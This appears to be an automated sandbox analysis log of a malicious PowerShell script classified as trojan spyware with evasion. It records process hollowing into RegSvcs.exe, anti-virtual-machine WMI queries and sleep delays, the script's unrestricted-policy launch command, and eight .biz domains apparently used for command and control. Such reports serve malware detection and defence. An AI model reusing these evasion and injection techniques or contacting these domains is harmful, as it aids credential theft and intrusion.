        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00419E2010_2_00419E20
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00404E3010_2_00404E30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00427E3010_2_00427E30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040F6C010_2_0040F6C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0041CEE010_2_0041CEE0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0041168510_2_00411685
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004336B010_2_004336B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00402F4010_2_00402F40
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00410F7A10_2_00410F7A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0041471010_2_00414710
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0042571010_2_00425710
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00431FCA10_2_00431FCA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00405FF010_2_00405FF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00439F8610_2_00439F86
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00423F8C10_2_00423F8C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00413C80 appears 123 times
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00408180 appears 43 times
        Source: classification engineClassification label: mal100.troj.spyw.evad.winPS1@8/5@10/2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0043B500 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,10_2_0043B500
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0yomkru3.2af.ps1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: 62.122.184.98 (3).ps1ReversingLabs: Detection: 15%
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\62.122.184.98 (3).ps1"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: #.dll.pdb source: powershell.exe, 00000001.00000002.1302987160.000001E09F368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1333650674.000001E0B7520000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1302987160.000001E0A0423000.00000004.00000800.00020000.00000000.sdmp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF7C0FD4C00 push E8FFFFFFh; iretd 1_2_00007FF7C0FD4C0D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF7C0FD540F push ds; retf 1_2_00007FF7C0FD5411
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00448874 push FFFFFFB2h; ret 10_2_00448876
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004412A0 push eax; mov dword ptr [esp], 1C1F1E71h10_2_004412A1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5212Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2380Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860Thread sleep time: -3689348814741908s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: RegSvcs.exe, 0000000A.00000002.1441949055.0000000000F74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWO
        Source: RegSvcs.exe, 0000000A.00000002.1441949055.0000000000F74000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1441949055.0000000000F1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0043FCF0 LdrInitializeThunk,10_2_0043FCF0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: powershell.exe, 00000001.00000002.1302987160.000001E09F592000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: truculengisau.biz
        Source: powershell.exe, 00000001.00000002.1302987160.000001E09F592000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: spookycappy.biz
        Source: powershell.exe, 00000001.00000002.1302987160.000001E09F592000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: punishzement.biz
        Source: powershell.exe, 00000001.00000002.1302987160.000001E09F592000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: nuttyshopr.biz
        Source: powershell.exe, 00000001.00000002.1302987160.000001E09F592000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: marketlumpe.biz
        Source: powershell.exe, 00000001.00000002.1302987160.000001E09F592000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: littlenotii.biz
        Source: powershell.exe, 00000001.00000002.1302987160.000001E09F592000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: grandiouseziu.biz
        Source: powershell.exe, 00000001.00000002.1302987160.000001E09F592000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: fraggielek.biz
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 444000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 447000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 455000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DE3008Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
